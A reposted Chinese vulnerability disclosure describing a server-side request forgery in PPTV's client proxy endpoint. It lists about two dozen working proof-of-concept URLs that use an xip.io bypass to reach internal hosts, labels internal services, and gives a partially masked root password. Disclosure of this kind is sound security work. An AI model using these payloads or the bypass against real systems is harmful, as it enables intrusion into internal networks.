记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

PPTV某处SSRF可探内网

2015-05-10 03:20
cba49e18ce14e08b6ae938990cd93f2b

简要描述:

PPTV某处SSRF可探内网

详细说明:

WooYun: PPTV某处代理可探测pptv内网
漏洞修复不完整,可绕过,泄露内网HTTP服务和敏感信息。 参考链接: WooYun: 乌云多数已修复SSRF漏洞可被绕过

漏洞证明:

code 区域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<span class="pln">http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.4.23.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.20.35.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.30.41.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//sso-cas.pplive.cn/cas/login?service=</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.188.47.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.250.50.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.10.53.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  zabbix</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.169.56.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.188.60.xip.io/sys_login.jsp?url=?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.101.72.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.188.74.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.188.76.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.189.95.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.189.100.xip.io//user/login?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.101.102.xip.io/allocateDB.php?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.20.105.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.187.116.xip.io/admin/?http://zt.pptv.com/clientzt/sports/ice/index.html   PPTV Shipyard   请用域用户名和密码登录</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.168.147.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html          Ops Tools Team Protal</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.10.167.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html        Foreman </span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html        PPTV字幕管理系统</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.168.171.xip.io//subtitle/index?http://zt.pptv.com/clientzt/sports/ice/index.html</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.189.204.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Log Server</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.187.228.xip.io/top10?http://zt.pptv.com/clientzt/sports/ice/index.html  Django</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.189.228.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html  Django</span>
<span class="pln">
http</span><span class="pun">:</span><span class="com">//client.pptv.com/v3/proxy?s=http://10.208.10.232.xip.io/?http://zt.pptv.com/clientzt/sports/ice/index.html   编码</span>

未授权访问后台:

 

通过目录浏览,可获取少量敏感信息,例如root默认口令。 pw=zMjs****_cd_pp**

修复方案:

严格限定可代理的目标

转载来源 lijiejie@乌云

扫“安全盒子”二维码,获取最新互联网资讯!

转载PPTV某处SSRF可探内网请注明出自:安全盒子

知识来源: www.secbox.cn/hacker/web/3352.html

阅读:87552 | 评论:0 | 标签:渗透测试

想收藏或者和大家分享这篇好文章→复制链接地址

“PPTV某处SSRF可探内网”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云